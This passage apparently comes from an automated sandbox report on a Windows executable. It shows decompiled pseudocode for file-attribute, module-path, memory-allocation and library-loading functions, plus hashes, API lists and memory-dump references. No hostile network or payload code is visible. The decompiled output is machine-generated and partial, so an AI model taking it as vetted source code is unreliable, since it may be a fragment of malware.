						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                            0x0040d75c
                                                            0x0040d75e
                                                            0x0040d762
                                                            0x0040d772
                                                            0x0040d77b
                                                            0x0040d780
                                                            0x0040d782
                                                            0x0040d787
                                                            0x0040d78c
                                                            0x0040d78c
                                                            0x0040d787
                                                            0x0040d79a

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                              • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                              • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileModuleName$LibraryLoad
                                                            • String ID:
                                                            • API String ID: 4113206344-0
                                                            • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                            • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                            • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005118B8, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E005118B8(intOrPtr* __eax, void* __edx) {
				void* _t15;
				intOrPtr _t16;
				intOrPtr* _t17;

				_t17 = __eax;
				_t1 = _t17 + 0x5c; // 0x27365
				_push( *_t1);
				_t15 =  *((intOrPtr*)( *__eax + 0xc8))();
				 *(__eax + 0x98) =  *(__eax + 0x98) | 0x00000004;
				if(( *(__eax + 0x1c) & 0x00000002) != 0) {
					_t10 = _t17 + 0x58; // 0x756c6156
					_t16 =  *_t10;
					 *((intOrPtr*)(__eax + 0x1b8)) = _t16;
					return _t16;
				}
				return _t15;
			}






                                                            0x005118ba
                                                            0x005118bd
                                                            0x005118c0
                                                            0x005118cb
                                                            0x005118d1
                                                            0x005118dc
                                                            0x005118de
                                                            0x005118de
                                                            0x005118e1
                                                            0x00000000
                                                            0x005118e1
                                                            0x005118e9

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(00027365,00000000,00000000,004C0068,006083EC,?,00000000,?,00000001,00000000,00000000,00000000,?,0068D5D0,00000001), ref: 005118CB
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                            • Instruction ID: 9fcb5f38b0df23c263da8a60913ea9fccafb23266d8756c351c2c96681b23a4d
                                                            • Opcode Fuzzy Hash: 1ef83a670f5add13b9a374239f5fba316326babbb4ed16e1d195e7c525f61efe
                                                            • Instruction Fuzzy Hash: 70E09A712056405BEB84DE5CC4C5B957BE9AF49214F1440E5ED498B25BC7749C48CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C68A4, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005C68A4(void* __eax) {
				signed char _t7;

				_t7 = GetFileAttributesW(E0040B278(__eax)); // executed
				if(_t7 == 0xffffffff || (_t7 & 0x00000010) == 0 || (_t7 & 0x00000004) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                            0x005c68af
                                                            0x005c68b7
                                                            0x005c68c5
                                                            0x005c68c6
                                                            0x005c68c9
                                                            0x005c68c9

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                            • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                            • Opcode Fuzzy Hash: 2c2e483fa7f1336923ebad64303dd8ba648d4ecb4c9f1657c83a641d7b42aed9
                                                            • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 005C685C, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E005C685C(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesW(E0040B278(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}




                                                            0x005c6867
                                                            0x005c686f
                                                            0x005c6878
                                                            0x005c6879
                                                            0x005c687c
                                                            0x005c687c

                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,005CD6D7,00000000), ref: 005C6867
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                            • Instruction ID: 78aee2f50b20cc69f9a983c300c852fe0a8819bfcc82724499c751dbdfa7c08b
                                                            • Opcode Fuzzy Hash: 339870d1e71ad855811f7abdfcd0412af3d786cf88be23b77bd5956e1918a324
                                                            • Instruction Fuzzy Hash: 86C08CA02412000A6E1065FE1CC9E5902E85E0533A3240B6EF438E22E3D629CAA3201A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00424020, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E00424020(void* __eax) {
				int _t4;

				_t4 = SetCurrentDirectoryW(E0040B278(__eax)); // executed
				asm("sbb eax, eax");
				return _t4 + 1;
			}




                                                            0x0042402b
                                                            0x00424033
                                                            0x00424037

                                                            APIs
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,006B8A06,00000000,006B8C15,?,?,00000005,00000000,006B8C4E,?,?,00000000), ref: 0042402B
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                            • Instruction ID: daf6799c843f8394e9bb8cef5a1a486137c4a768e82a56cfe4f83ef7845b6ded
                                                            • Opcode Fuzzy Hash: df8aed0e477c8dea0ce41bbd81e691bd114315e892edfb9c442192a2e0a47cf9
                                                            • Instruction Fuzzy Hash: 9AB012A27903400ACE0075FF0CC9D1D00CCD95920F7200FBFB409D2143D57EC484001C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042B8A3, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 50%
                                                            			E0042B8A3() {
				int _t4;
				intOrPtr _t7;
				void* _t8;

				_pop(_t7);
				 *[fs:eax] = _t7;
				_push(0x42b8c1);
				_t4 = SetErrorMode( *(_t8 - 0xc)); // executed
				return _t4;
			}






                                                            0x0042b8a5
                                                            0x0042b8a8
                                                            0x0042b8ab
                                                            0x0042b8b4
                                                            0x0042b8b9

                                                            APIs
                                                            • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                            • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                            • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 006ACE20, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E006ACE20() {
				struct HINSTANCE__* _t2;

				 *0x6d68a8 = 0;
				if( *0x6d68a4 != 0) {
					_t2 =  *0x6d68a4; // 0x0
					FreeLibrary(_t2); // executed
					 *0x6d68a4 = 0;
					return 0;
				}
				return 0;
			}




                                                            0x006ace22
                                                            0x006ace2e
                                                            0x006ace30
                                                            0x006ace36
                                                            0x006ace3d
                                                            0x00000000
                                                            0x006ace3d
                                                            0x006ace42

                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID:
                                                            • API String ID: 3664257935-0
                                                            • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                            • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                            • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0047845C, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0047845C(intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				void* _t14;
				void _t15;
				void* _t24;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0x6d4ff8 == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0x6d4ff4; // 0x0
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E0040714C(0x6c7a94, _t24, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00478454(_t2, 0x478434);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00478454(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0x6d4ff8;
						 *0x6d4ff8 = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0x6d4ff4 = _t35;
				}
				_t25 =  *0x6d4ff8;
				 *0x6d4ff8 =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0x6d4ff8;
			}










                                                            0x0047846a
                                                            0x0047847a
                                                            0x0047847f
                                                            0x00478481
                                                            0x00478486
                                                            0x00478488
                                                            0x00478495
                                                            0x0047849f
                                                            0x004784a7
                                                            0x004784aa
                                                            0x004784aa
                                                            0x004784ad
                                                            0x004784ad
                                                            0x004784b0
                                                            0x004784ba
                                                            0x004784bf
                                                            0x004784c2
                                                            0x004784c4
                                                            0x004784cb
                                                            0x004784d2
                                                            0x004784d2
                                                            0x004784da
                                                            0x004784df
                                                            0x004784e4
                                                            0x004784ea
                                                            0x004784f1

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                            • Opcode Fuzzy Hash: 6c24b6a0fe5a989e3bb969723c1e56f7bd6d6c9795a823755d6c712a70d0a833
                                                            • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004056E8(signed int __eax) {
				void* _t4;
				intOrPtr _t7;
				signed int _t8;
				void** _t10;
				void* _t12;
				void* _t14;

				_t8 = __eax;
				E0040567C(__eax);
				_t4 = VirtualAlloc(0, 0x13fff0, 0x1000, 4); // executed
				if(_t4 == 0) {
					 *0x6cfaf4 = 0;
					return 0;
				} else {
					_t10 =  *0x6cfae0; // 0x6cfadc
					_t14 = _t4;
					 *_t14 = 0x6cfadc;
					 *0x6cfae0 = _t4;
					 *(_t14 + 4) = _t10;
					 *_t10 = _t4;
					_t12 = _t14 + 0x13fff0;
					 *((intOrPtr*)(_t12 - 4)) = 2;
					 *0x6cfaf4 = 0x13ffe0 - _t8;
					_t7 = _t12 - _t8;
					 *0x6cfaf0 = _t7;
					 *(_t7 - 4) = _t8 | 0x00000002;
					return _t7;
				}
			}









                                                            0x004056ea
                                                            0x004056ec
                                                            0x004056ff
                                                            0x00405706
                                                            0x00405758
                                                            0x00405761
                                                            0x00405708
                                                            0x00405708
                                                            0x0040570e
                                                            0x00405710
                                                            0x00405716
                                                            0x0040571b
                                                            0x0040571e
                                                            0x00405722
                                                            0x0040572d
                                                            0x0040573a
                                                            0x00405742
                                                            0x00405744
                                                            0x00405751
                                                            0x00405755
                                                            0x00405755

                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                            • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                            • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 78%
                                                            			E0040E0D4(short* __eax, intOrPtr __edx) {
				short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				struct _WIN32_FIND_DATAW _v612;
				short _v1134;
				signed int _t50;
				signed int _t51;
				void* _t55;
				signed int _t88;
				signed int _t89;
				intOrPtr* _t90;
				signed int _t101;
				signed int _t102;
				short* _t112;
				struct HINSTANCE__* _t113;
				short* _t115;
				short* _t116;
				void* _t117;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t113 = GetModuleHandleW(L"kernel32.dll");
				if(_t113 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t115 = _v8 + 4;
						goto L10;
					} else {
						if( *((short*)(_v8 + 2)) == 0x5c) {
							_t116 = E0040E0B0(_v8 + 4);
							if( *_t116 != 0) {
								_t14 = _t116 + 2; // 0x2
								_t115 = E0040E0B0(_t14);
								if( *_t115 != 0) {
									L10:
									_t88 = _t115 - _v8;
									_t89 = _t88 >> 1;
									if(_t88 < 0) {
										asm("adc ebx, 0x0");
									}
									_t43 = _t89 + 1;
									if(_t89 + 1 <= 0x105) {
										E0040DAF8( &_v1134, _v8, _t43);
										while( *_t115 != 0) {
											_t112 = E0040E0B0(_t115 + 2);
											_t50 = _t112 - _t115;
											_t51 = _t50 >> 1;
											if(_t50 < 0) {
												asm("adc eax, 0x0");
											}
											if(_t51 + _t89 + 1 <= 0x105) {
												_t55 =  &_v1134 + _t89 + _t89;
												_t101 = _t112 - _t115;
												_t102 = _t101 >> 1;
												if(_t101 < 0) {
													asm("adc edx, 0x0");
												}
												E0040DAF8(_t55, _t115, _t102 + 1);
												_v20 = FindFirstFileW( &_v1134,  &_v612);
												if(_v20 != 0xffffffff) {
													FindClose(_v20);
													if(lstrlenW( &(_v612.cFileName)) + _t89 + 1 + 1 <= 0x105) {
														 *((short*)(_t117 + _t89 * 2 - 0x46a)) = 0x5c;
														E0040DAF8( &_v1134 + _t89 + _t89 + 2,  &(_v612.cFileName), 0x105 - _t89 - 1);
														_t89 = _t89 + lstrlenW( &(_v612.cFileName)) + 1;
														_t115 = _t112;
														continue;
													}
												}
											}
											goto L24;
										}
										E0040DAF8(_v8,  &_v1134, _v12);
									}
								}
							}
						}
					}
				} else {
					_t90 = GetProcAddress(_t113, "GetLongPathNameW");
					if(_t90 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v1134);
						_push(_v8);
						if( *_t90() == 0) {
							goto L4;
						} else {
							E0040DAF8(_v8,  &_v1134, _v12);
						}
					}
				}
				L24:
				return _v16;
			}






















                                                            0x0040e0e0
                                                            0x0040e0e3
                                                            0x0040e0e9
                                                            0x0040e0f6
                                                            0x0040e0fa
                                                            0x0040e139
                                                            0x0040e140
                                                            0x0040e180
                                                            0x00000000
                                                            0x0040e142
                                                            0x0040e14a
                                                            0x0040e15b
                                                            0x0040e161
                                                            0x0040e167
                                                            0x0040e16f
                                                            0x0040e175
                                                            0x0040e183
                                                            0x0040e185
                                                            0x0040e188
                                                            0x0040e18a
                                                            0x0040e18c
                                                            0x0040e18c
                                                            0x0040e18f
                                                            0x0040e197
                                                            0x0040e1a8
                                                            0x0040e26f
                                                            0x0040e1ba
                                                            0x0040e1be
                                                            0x0040e1c0
                                                            0x0040e1c2
                                                            0x0040e1c4
                                                            0x0040e1c4
                                                            0x0040e1cf
                                                            0x0040e1df
                                                            0x0040e1e3
                                                            0x0040e1e5
                                                            0x0040e1e7
                                                            0x0040e1e9
                                                            0x0040e1e9
                                                            0x0040e1ef
                                                            0x0040e207
                                                            0x0040e20e
                                                            0x0040e214
                                                            0x0040e230
                                                            0x0040e232
                                                            0x0040e259
                                                            0x0040e26b
                                                            0x0040e26d
                                                            0x00000000
                                                            0x0040e26d
                                                            0x0040e230
                                                            0x0040e20e
                                                            0x00000000
                                                            0x0040e1cf
                                                            0x0040e285
                                                            0x0040e285
                                                            0x0040e197
                                                            0x0040e175
                                                            0x0040e161
                                                            0x0040e14a
                                                            0x0040e0fc
                                                            0x0040e107
                                                            0x0040e10b
                                                            0x00000000
                                                            0x0040e10d
                                                            0x0040e10d
                                                            0x0040e118
                                                            0x0040e11c
                                                            0x0040e121
                                                            0x00000000
                                                            0x0040e123
                                                            0x0040e12f
                                                            0x0040e12f
                                                            0x0040e121
                                                            0x0040e10b
